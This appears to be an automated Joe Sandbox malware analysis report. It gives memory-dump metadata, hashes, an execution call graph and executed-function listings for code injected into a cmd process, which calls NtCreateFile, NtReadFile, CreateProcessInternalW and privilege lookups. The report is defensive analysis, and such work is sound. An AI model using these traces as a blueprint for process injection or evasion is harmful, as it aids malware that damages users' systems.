                                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00405D33,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B1A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                                        • String ID:
                                                                                        • API String ID: 190613189-0
                                                                                        • Opcode ID: c17fcd1cf7dd52c707961598001fbe9307a221727c523cbd792ccb3aa3d95fe1
                                                                                        • Instruction ID: 2cbfd0870324320007afb9b70b5ca04d8eb3af27e3ea935175830c0dc6d3898b
                                                                                        • Opcode Fuzzy Hash: c17fcd1cf7dd52c707961598001fbe9307a221727c523cbd792ccb3aa3d95fe1
                                                                                        • Instruction Fuzzy Hash: 50F0C231604414BFC702DBA9DC40D9EBBB8EF46250B2540A6E800F7251D274FE01ABA9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Execution Graph

                                                                                        Execution Coverage:1.5%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:3.8%
                                                                                        Total number of Nodes:472
                                                                                        Total number of Limit Nodes:66
                                                                                        execution_graph 91926 3b229f0 LdrInitializeThunk 91928 2def1bd 91931 2deb9d0 91928->91931 91932 2deb9f6 91931->91932 91939 2dd9d40 91932->91939 91934 2deba02 91935 2deba26 91934->91935 91947 2dd8f30 91934->91947 91983 2dea6b0 91935->91983 91986 2dd9c90 91939->91986 91941 2dd9d4d 91942 2dd9d54 91941->91942 91998 2dd9c30 91941->91998 91942->91934 91948 2dd8f57 91947->91948 92308 2ddb1c0 91948->92308 91950 2dd8f69 92312 2ddaf10 91950->92312 91952 2dd8f86 91959 2dd8f8d 91952->91959 92373 2ddae40 LdrLoadDll 91952->92373 91955 2dd8ffc 92328 2ddf410 91955->92328 91957 2dd9006 91958 2debf90 2 API calls 91957->91958 91978 2dd90f2 91957->91978 91960 2dd902a 91958->91960 91959->91978 92316 2ddf380 91959->92316 91961 2debf90 2 API calls 91960->91961 91962 2dd903b 91961->91962 91963 2debf90 2 API calls 91962->91963 91964 2dd904c 91963->91964 92340 2ddca90 91964->92340 91966 2dd9059 91967 2de4a50 8 API calls 91966->91967 91968 2dd9066 91967->91968 91969 2de4a50 8 API calls 91968->91969 91970 2dd9077 91969->91970 91971 2dd90a5 91970->91971 91972 2dd9084 91970->91972 91974 2de4a50 8 API calls 91971->91974 92350 2ddd620 91972->92350 91980 2dd90c1 91974->91980 91975 2dd908b 92356 2dd8d00 91975->92356 91976 2dd90e9 91977 2dd8d00 19 API calls 91976->91977 91977->91978 91978->91935 91980->91976 92374 2ddd6c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 91980->92374 91984 2deaf60 LdrLoadDll 91983->91984 91985 2dea6cf 91984->91985 92017 2de8bc0 91986->92017 91990 2dd9cb6 91990->91941 91991 2dd9cac 91991->91990 92024 2deb2b0 91991->92024 91993 2dd9cf3 91993->91990 92035 2dd9ab0 91993->92035 91995 2dd9d13 92041 2dd9620 LdrLoadDll 91995->92041 91997 2dd9d25 91997->91941 92282 2deb5a0 91998->92282 92001 2deb5a0 LdrLoadDll 92002 2dd9c5b 92001->92002 92003 2deb5a0 LdrLoadDll 92002->92003 92004 2dd9c71 92003->92004 92005 2ddf180 92004->92005 92006 2ddf199 92005->92006 92291 2ddb040 92006->92291 92008 2ddf1ac 92295 2dea1e0 92008->92295 92012 2ddf1d2 92013 2ddf1fd 92012->92013 92301 2dea260 92012->92301 92014 2dea490 2 API calls 92013->92014 92015 2dd9d65 92014->92015 92015->91934 92018 2de8bcf 92017->92018 92042 2de4e50 92018->92042 92020 2dd9ca3 92021 2de8a70 92020->92021 92048 2dea600 92021->92048 92025 2deb2c9 92024->92025 92055 2de4a50 92025->92055 92027 2deb2e1 92028 2deb2ea 92027->92028 92088 2deb0f0 92027->92088 92028->91993 92030 2deb2fe 92030->92028 92102 2de9f00 92030->92102 92263 2dd7ea0 92035->92263 92037 2dd9ad1 92037->91995 92038 2dd9aca 92038->92037 92273 2dd8160 92038->92273 92041->91997 92043 2de4e6a 92042->92043 92044 2de4e5e 92042->92044 92043->92020 92044->92043 92047 2de52d0 LdrLoadDll 92044->92047 92046 2de4fbc 92046->92020 92047->92046 92051 2deaf60 92048->92051 92050 2de8a85 92050->91991 92052 2deaf70 92051->92052 92054 2deaf92 92051->92054 92053 2de4e50 LdrLoadDll 92052->92053 92053->92054 92054->92050 92056 2de4b73 92055->92056 92060 2de4a64 92055->92060 92056->92027 92058 2de4bb7 92059 2debdc0 2 API calls 92058->92059 92064 2de4bc3 92059->92064 92060->92056 92110 2dea360 92060->92110 92061 2de4d49 92063 2dea490 2 API calls 92061->92063 92062 2de4d5f 92175 2de4790 LdrLoadDll NtReadFile NtClose 92062->92175 92065 2de4d50 92063->92065 92064->92056 92064->92061 92064->92062 92068 2de4c52 92064->92068 92065->92027 92067 2de4d72 92067->92027 92069 2de4cb9 92068->92069 92071 2de4c61 92068->92071 92069->92061 92070 2de4ccc 92069->92070 92168 2dea2e0 92070->92168 92072 2de4c7a 92071->92072 92073 2de4c66 92071->92073 92076 2de4c7f 92072->92076 92077 2de4c97 92072->92077 92167 2de4650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 92073->92167 92113 2de46f0 92076->92113 92077->92065 92125 2de4410 92077->92125 92080 2de4c70 92080->92027 92082 2de4d2c 92172 2dea490 92082->92172 92083 2de4c8d 92083->92027 92086 2de4caf 92086->92027 92087 2de4d38 92087->92027 92090 2deb101 92088->92090 92089 2deb113 92089->92030 92090->92089 92193 2de4070 92090->92193 92092 2deb180 92092->92030 92093 2deb157 92093->92092 92094 2de4070 3 API calls 92093->92094 92096 2deb179 92094->92096 92096->92092 92225 2de5390 92096->92225 92097 2deb20a 92099 2deb21a 92097->92099 92240 2deaf00 LdrLoadDll 92097->92240 92235 2de9ec0 92099->92235 92103 2de9f1c 92102->92103 92104 2deaf60 LdrLoadDll 92102->92104 92257 3b22b2a 92103->92257 92104->92103 92105 2de9f37 92107 2debdc0 92105->92107 92260 2dea670 92107->92260 92109 2deb359 92109->91993 92111 2deaf60 LdrLoadDll 92110->92111 92112 2dea37c NtCreateFile 92111->92112 92112->92058 92114 2de470c 92113->92114 92115 2dea2e0 LdrLoadDll 92114->92115 92116 2de472d 92115->92116 92117 2de4748 92116->92117 92118 2de4734 92116->92118 92120 2dea490 2 API calls 92117->92120 92119 2dea490 2 API calls 92118->92119 92121 2de473d 92119->92121 92122 2de4751 92120->92122 92121->92083 92176 2debfd0 LdrLoadDll RtlAllocateHeap 92122->92176 92124 2de475c 92124->92083 92126 2de448e 92125->92126 92127 2de445b 92125->92127 92129 2de45d9 92126->92129 92133 2de44aa 92126->92133 92128 2dea2e0 LdrLoadDll 92127->92128 92130 2de4476 92128->92130 92131 2dea2e0 LdrLoadDll 92129->92131 92132 2dea490 2 API calls 92130->92132 92137 2de45f4 92131->92137 92134 2de447f 92132->92134 92135 2dea2e0 LdrLoadDll 92133->92135 92134->92086 92136 2de44c5 92135->92136 92139 2de44cc 92136->92139 92140 2de44e1 92136->92140 92189 2dea320 LdrLoadDll 92137->92189 92144 2dea490 2 API calls 92139->92144 92141 2de44fc 92140->92141 92142 2de44e6 92140->92142 92153 2de4501 92141->92153 92177 2debf90 92141->92177 92145 2dea490 2 API calls 92142->92145 92143 2de462e 92146 2dea490 2 API calls 92143->92146 92147 2de44d5 92144->92147 92148 2de44ef 92145->92148 92149 2de4639 92146->92149 92147->92086 92148->92086 92149->92086 92152 2de4567 92154 2de457e 92152->92154 92188 2dea2a0 LdrLoadDll 92152->92188 92160 2de4513 92153->92160 92180 2dea410 92153->92180 92156 2de459a 92154->92156 92157 2de4585 92154->92157 92159 2dea490 2 API calls 92156->92159 92158 2dea490 2 API calls 92157->92158 92158->92160 92161 2de45a3 92159->92161 92160->92086 92162 2de45cf 92161->92162 92183 2debb90 92161->92183 92162->92086 92164 2de45ba 92165 2debdc0 2 API calls 92164->92165 92166 2de45c3 92165->92166 92166->92086 92167->92080 92169 2deaf60 LdrLoadDll 92168->92169 92170 2de4d14 92168->92170 92169->92170 92171 2dea320 LdrLoadDll 92170->92171 92171->92082 92173 2deaf60 LdrLoadDll 92172->92173 92174 2dea4ac NtClose 92173->92174 92174->92087 92175->92067 92176->92124 92190 2dea630 92177->92190 92179 2debfa8 92179->92153 92181 2deaf60 LdrLoadDll 92180->92181 92182 2dea42c NtReadFile 92181->92182 92182->92152 92184 2debb9d 92183->92184 92185 2debbb4 92183->92185 92184->92185 92186 2debf90 2 API calls 92184->92186 92185->92164 92187 2debbcb 92186->92187 92187->92164 92188->92154 92189->92143 92191 2deaf60 LdrLoadDll 92190->92191 92192 2dea64c RtlAllocateHeap 92191->92192 92192->92179 92194 2de4081 92193->92194 92195 2de4089 92193->92195 92194->92093 92196 2de435c 92195->92196 92241 2decf30 92195->92241 92196->92093 92198 2de40dd 92199 2decf30 2 API calls 92198->92199 92202 2de40e8 92199->92202 92200 2de4136 92203 2decf30 2 API calls 92200->92203 92202->92200 92204 2ded060 3 API calls 92202->92204 92255 2decfd0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 92202->92255 92206 2de414a 92203->92206 92204->92202 92205 2de41a7 92207 2decf30 2 API calls 92205->92207 92206->92205 92246 2ded060 92206->92246 92209 2de41bd 92207->92209 92210 2de41fa 92209->92210 92213 2ded060 3 API calls 92209->92213 92211 2decf30 2 API calls 92210->92211 92212 2de4205 92211->92212 92214 2ded060 3 API calls 92212->92214 92221 2de423f 92212->92221 92213->92209 92214->92212 92217 2decf90 2 API calls 92218 2de433e 92217->92218 92219 2decf90 2 API calls 92218->92219 92220 2de4348 92219->92220 92222 2decf90 2 API calls 92220->92222 92252 2decf90 92221->92252 92223 2de4352 92222->92223 92224 2decf90 2 API calls 92223->92224 92224->92196 92226 2de53a1 92225->92226 92227 2de4a50 8 API calls 92226->92227 92228 2de53b7 92227->92228 92229 2de5405 92228->92229 92230 2de53f2 92228->92230 92234 2de540a 92228->92234 92232 2debdc0 2 API calls 92229->92232 92231 2debdc0 2 API calls 92230->92231 92233 2de53f7 92231->92233 92232->92234 92233->92097 92234->92097 92236 2deaf60 LdrLoadDll 92235->92236 92237 2de9edc 92236->92237 92256 3b22d10 LdrInitializeThunk 92237->92256 92238 2de9ef3 92238->92030 92240->92099 92242 2decf46 92241->92242 92243 2decf40 92241->92243 92244 2debf90 2 API calls 92242->92244 92243->92198 92245 2decf6c 92244->92245 92245->92198 92247 2decfd0 92246->92247 92248 2ded02d 92247->92248 92249 2debf90 2 API calls 92247->92249 92248->92206 92250 2ded00a 92249->92250 92251 2debdc0 2 API calls 92250->92251 92251->92248 92253 2debdc0 2 API calls 92252->92253 92254 2de4334 92253->92254 92254->92217 92255->92202 92256->92238 92258 3b22b31 92257->92258 92259 3b22b3f LdrInitializeThunk 92257->92259 92258->92105 92259->92105 92261 2deaf60 LdrLoadDll 92260->92261 92262 2dea68c RtlFreeHeap 92261->92262 92262->92109 92264 2dd7eab 92263->92264 92270 2dd7eb0 92263->92270 92264->92038 92265 2dd7f38 92265->92038 92266 2de9ec0 2 API calls 92266->92270 92267 2dd7f3e 92268 2dd7f64 92267->92268 92271 2dea5c0 2 API calls 92267->92271 92268->92038 92270->92265 92270->92266 92270->92267 92276 2dea5c0 92270->92276 92272 2dd7f55 92271->92272 92272->92038 92274 2dd817e 92273->92274 92275 2dea5c0 2 API calls 92273->92275 92274->91995 92275->92274 92277 2deaf60 LdrLoadDll 92276->92277 92278 2dea5dc 92277->92278 92281 3b22b90 LdrInitializeThunk 92278->92281 92279 2dea5f3 92279->92270 92281->92279 92283 2deb5c3 92282->92283 92286 2ddacf0 92283->92286 92285 2dd9c4a 92285->92001 92288 2ddad14 92286->92288 92287 2ddad1b 92287->92285 92288->92287 92289 2ddad67 92288->92289 92290 2ddad50 LdrLoadDll 92288->92290 92289->92285 92290->92289 92292 2ddb063 92291->92292 92294 2ddb0e0 92292->92294 92306 2de9c90 LdrLoadDll 92292->92306 92294->92008 92296 2deaf60 LdrLoadDll 92295->92296 92297 2ddf1bb 92296->92297 92297->92015 92298 2dea7d0 92297->92298 92299 2deaf60 LdrLoadDll 92298->92299 92300 2dea7ef LookupPrivilegeValueW 92299->92300 92300->92012 92302 2dea27c 92301->92302 92303 2deaf60 LdrLoadDll 92301->92303 92307 3b22dc0 LdrInitializeThunk 92302->92307 92303->92302 92304 2dea29b 92304->92013 92306->92294 92307->92304 92309 2ddb1f0 92308->92309 92310 2ddb040 LdrLoadDll 92309->92310 92311 2ddb204 92310->92311 92311->91950 92313 2ddaf34 92312->92313 92375 2de9c90 LdrLoadDll 92313->92375 92315 2ddaf6e 92315->91952 92317 2ddf3ac 92316->92317 92318 2ddb1c0 LdrLoadDll 92317->92318 92319 2ddf3be 92318->92319 92376 2ddf290 92319->92376 92322 2ddf3d9 92323 2dea490 2 API calls 92322->92323 92325 2ddf3e4 92322->92325 92323->92325 92324 2ddf3f1 92326 2dea490 2 API calls 92324->92326 92327 2ddf402 92324->92327 92325->91955 92326->92327 92327->91955 92329 2ddf43c 92328->92329 92395 2ddb2b0 92329->92395 92331 2ddf44e 92332 2ddf290 3 API calls 92331->92332 92333 2ddf45f 92332->92333 92334 2ddf469 92333->92334 92335 2ddf481 92333->92335 92336 2ddf474 92334->92336 92338 2dea490 2 API calls 92334->92338 92337 2ddf492 92335->92337 92339 2dea490 2 API calls 92335->92339 92336->91957 92337->91957 92338->92336 92339->92337 92341 2ddcaa6 92340->92341 92342 2ddcab0 92340->92342 92341->91966 92343 2ddaf10 LdrLoadDll 92342->92343 92344 2ddcb4e 92343->92344 92345 2ddcb74 92344->92345 92346 2ddb040 LdrLoadDll 92344->92346 92345->91966 92347 2ddcb90 92346->92347 92348 2de4a50 8 API calls 92347->92348 92349 2ddcbe5 92348->92349 92349->91966 92351 2ddd646 92350->92351 92352 2ddb040 LdrLoadDll 92351->92352 92353 2ddd65a 92352->92353 92399 2ddd310 92353->92399 92355 2ddd6ac 92355->91975 92358 2dd8d14 92356->92358 92426 2ddf6d0 92356->92426 92368 2dd8f25 92358->92368 92431 2de43a0 92358->92431 92360 2dd8d70 92360->92368 92434 2dd8ab0 92360->92434 92363 2decf30 2 API calls 92364 2dd8db2 92363->92364 92365 2ded060 3 API calls 92364->92365 92372 2dd8dc7 92365->92372 92366 2dd7ea0 3 API calls 92366->92372 92368->91935 92370 2ddc7b0 16 API calls 92370->92372 92371 2dd8160 2 API calls 92371->92372 92372->92366 92372->92368 92372->92370 92372->92371 92438 2ddf670 92372->92438 92442 2ddf080 13 API calls 92372->92442 92373->91959 92374->91976 92375->92315 92377 2ddf2aa 92376->92377 92385 2ddf360 92376->92385 92378 2ddb040 LdrLoadDll 92377->92378 92379 2ddf2cc 92378->92379 92386 2de9f40 92379->92386 92381 2ddf30e 92389 2de9f80 92381->92389 92384 2dea490 2 API calls 92384->92385 92385->92322 92385->92324 92387 2deaf60 LdrLoadDll 92386->92387 92388 2de9f5c 92387->92388 92388->92381 92390 2deaf60 LdrLoadDll 92389->92390 92391 2de9f9c 92390->92391 92394 3b234e0 LdrInitializeThunk 92391->92394 92392 2ddf354 92392->92384 92394->92392 92396 2ddb2d7 92395->92396 92397 2ddb040 LdrLoadDll 92396->92397 92398 2ddb313 92397->92398 92398->92331 92400 2ddd327 92399->92400 92408 2ddf710 92400->92408 92404 2ddd39b 92405 2ddd3a2 92404->92405 92418 2dea2a0 LdrLoadDll 92404->92418 92405->92355 92407 2ddd3b5 92407->92355 92409 2ddf735 92408->92409 92419 2dd81a0 92409->92419 92411 2ddf759 92412 2ddd36f 92411->92412 92413 2de4a50 8 API calls 92411->92413 92414 2debdc0 2 API calls 92411->92414 92415 2dea6e0 92412->92415 92413->92411 92414->92411 92416 2dea6ff CreateProcessInternalW 92415->92416 92417 2deaf60 LdrLoadDll 92415->92417 92416->92404 92417->92416 92418->92407 92420 2dd829f 92419->92420 92421 2dd81b5 92419->92421 92420->92411 92421->92420 92422 2de4a50 8 API calls 92421->92422 92423 2dd8222 92422->92423 92424 2debdc0 2 API calls 92423->92424 92425 2dd8249 92423->92425 92424->92425 92425->92411 92427 2de4e50 LdrLoadDll 92426->92427 92428 2ddf6ef 92427->92428 92429 2ddf6fd 92428->92429 92430 2ddf6f6 SetErrorMode 92428->92430 92429->92358 92430->92429 92443 2ddf4a0 92431->92443 92433 2de43c6 92433->92360 92435 2dd8ad5 92434->92435 92436 2dd8cea 92435->92436 92462 2de9880 92435->92462 92436->92363 92439 2ddf683 92438->92439 92503 2de9e90 92439->92503 92442->92372 92444 2ddf4bd 92443->92444 92450 2de9fc0 92444->92450 92447 2ddf505 92447->92433 92451 2deaf60 LdrLoadDll 92450->92451 92452 2de9fdc 92451->92452 92460 3b22e50 LdrInitializeThunk 92452->92460 92453 2ddf4fe 92453->92447 92455 2dea010 92453->92455 92456 2deaf60 LdrLoadDll 92455->92456 92457 2dea02c 92456->92457 92461 3b22c30 LdrInitializeThunk 92457->92461 92458 2ddf52e 92458->92433 92460->92453 92461->92458 92463 2debf90 2 API calls 92462->92463 92464 2de9897 92463->92464 92477 2dd9310 92464->92477 92466 2de98b2 92467 2de98d9 92466->92467 92470 2de98f0 92466->92470 92468 2debdc0 2 API calls 92467->92468 92469 2de98e6 92468->92469 92469->92436 92471 2de9bd0 92470->92471 92474 2de9be4 92470->92474 92472 2debdc0 2 API calls 92471->92472 92473 2de9bda 92472->92473 92473->92436 92475 2debdc0 2 API calls 92474->92475 92476 2de9c39 92475->92476 92476->92436 92478 2dd9335 92477->92478 92479 2ddacf0 LdrLoadDll 92478->92479 92480 2dd9368 92479->92480 92482 2dd938d 92480->92482 92483 2ddcf20 92480->92483 92482->92466 92484 2ddcf4c 92483->92484 92485 2dea1e0 LdrLoadDll 92484->92485 92486 2ddcf65 92485->92486 92487 2ddcf6c 92486->92487 92494 2dea220 92486->92494 92487->92482 92491 2ddcfa7 92492 2dea490 2 API calls 92491->92492 92493 2ddcfca 92492->92493 92493->92482 92495 2dea23c 92494->92495 92496 2deaf60 LdrLoadDll 92494->92496 92502 3b22bc0 LdrInitializeThunk 92495->92502 92496->92495 92497 2ddcf8f 92497->92487 92499 2dea810 92497->92499 92500 2deaf60 LdrLoadDll 92499->92500 92501 2dea82f 92500->92501 92501->92491 92502->92497 92504 2deaf60 LdrLoadDll 92503->92504 92505 2de9eac 92504->92505 92508 3b22cf0 LdrInitializeThunk 92505->92508 92506 2ddf6ae 92506->92372 92508->92506 92509 2de9080 92511 2de9086 92509->92511 92510 2de919c 92511->92510 92512 2ddacf0 LdrLoadDll 92511->92512 92513 2de90f1 92512->92513 92514 2de4e50 LdrLoadDll 92513->92514 92516 2de910d 92514->92516 92515 2de9120 Sleep 92515->92516 92516->92510 92516->92515 92518 2de8eb0 LdrLoadDll 92516->92518 92518->92516

                                                                                        Executed Functions

                                                                                        Function 02DEA360 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 401 2dea360-2dea3b1 call 2deaf60 NtCreateFile
                                                                                        APIs
                                                                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,02DE4BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02DE4BB7,007A002E,00000000,00000060,00000000,00000000), ref: 02DEA3AD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2dd0000_cmd.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID: .z`
                                                                                        • API String ID: 823142352-1441809116
                                                                                        • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                        • Instruction ID: c763c553fa8e3c45753cd92aeecf7c1adc68e5bca318964cc0f0890a960f70da
                                                                                        • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                        • Instruction Fuzzy Hash: E8F0BDB2200208ABCB08DF88DC84EEB77ADEF8C754F158248BA0D97240C630E8118BA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02DEA410 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtReadFile.NTDLL(02DE4D72,5EB65239,FFFFFFFF,02DE4A31,?,?,02DE4D72,?,02DE4A31,FFFFFFFF,5EB65239,02DE4D72,?,00000000), ref: 02DEA455
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2dd0000_cmd.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FileRead
                                                                                        • String ID:
                                                                                        • API String ID: 2738559852-0
                                                                                        • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                        • Instruction ID: e13de1336ab060622a7a414e305ed18da9fc908d182f1a3b503396839284920c
                                                                                        • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                        • Instruction Fuzzy Hash: 36F0A4B2200208ABCB14DF89DC80EEB77ADEF8C754F158248BA1D97241D630E8118BA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02DEA48A Relevance: 1.5, APIs: 1, Instructions: 26nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtClose.NTDLL(02DE4D50,?,?,02DE4D50,00000000,FFFFFFFF), ref: 02DEA4B5
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2dd0000_cmd.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Close
                                                                                        • String ID:
                                                                                        • API String ID: 3535843008-0
                                                                                        • Opcode ID: 379bf8c8bc80f6b04e513f4be78273d8523dd32beb7ad9743bc4c1f83bf53e98
                                                                                        • Instruction ID: 7ba548fc81958882840a07e15e7f0d17be48a1bc22b859dd3b9c23f4b79da17e
                                                                                        • Opcode Fuzzy Hash: 379bf8c8bc80f6b04e513f4be78273d8523dd32beb7ad9743bc4c1f83bf53e98
                                                                                        • Instruction Fuzzy Hash: 81E0D8B26001187ED614EBE8DC45EABB76DEF80754F15405AF90D5B142C631B5108BE0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02DEA490 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtClose.NTDLL(02DE4D50,?,?,02DE4D50,00000000,FFFFFFFF), ref: 02DEA4B5
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2dd0000_cmd.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Close
                                                                                        • String ID:
                                                                                        • API String ID: 3535843008-0
                                                                                        • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                        • Instruction ID: e6cef175d3a72370aa47bc41fe2d848f6c7fd767b34ff1b41002c7e5cf92744e
                                                                                        • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                        • Instruction Fuzzy Hash: 8ED01276200214ABD710EB98CC45E97775DEF44750F154455BA195B241C530F90086E0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03B234E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: fe1fb21b874dde8ba390e02b32e6360245f99ce62e666ce1043a0d6f67d37a7b
                                                                                        • Instruction ID: cfc5f5bb08d5945381774a86876455a33ea497b919ac715300617f900fa4b1ee
                                                                                        • Opcode Fuzzy Hash: fe1fb21b874dde8ba390e02b32e6360245f99ce62e666ce1043a0d6f67d37a7b
                                                                                        • Instruction Fuzzy Hash: F490023260511802D500A15846147062005C7D1205F61C865B0418568DD7A5895575A3
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03B22B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 5d58fe9054e801ddb2995cc0f0998d21ac931e707eef2aaa75c7b74eaeea62ee
                                                                                        • Instruction ID: 797e7823a96119a01f4648f40c2c3d98feb7553100d23878683bdaff7367fb36
                                                                                        • Opcode Fuzzy Hash: 5d58fe9054e801ddb2995cc0f0998d21ac931e707eef2aaa75c7b74eaeea62ee
                                                                                        • Instruction Fuzzy Hash: 6190023220109C02D510A158850474A1005C7D1305F55C865B4418658DD7A588957122
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03B22B80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 4f6e08697278ce08fb716680c7e08259b2e1da720f4f5ed88bfb7f8b9e60e12a
                                                                                        • Instruction ID: 30318009e4a5552fb59fe464584b5cd5aa73c3c5ff0bc4c7422c0b861c3ebdb4
                                                                                        • Opcode Fuzzy Hash: 4f6e08697278ce08fb716680c7e08259b2e1da720f4f5ed88bfb7f8b9e60e12a
                                                                                        • Instruction Fuzzy Hash: 7590023220101C42D500A1584504B461005C7E1305F51C46AB0118654DD725C8557522
                                                                                        Uniqueness

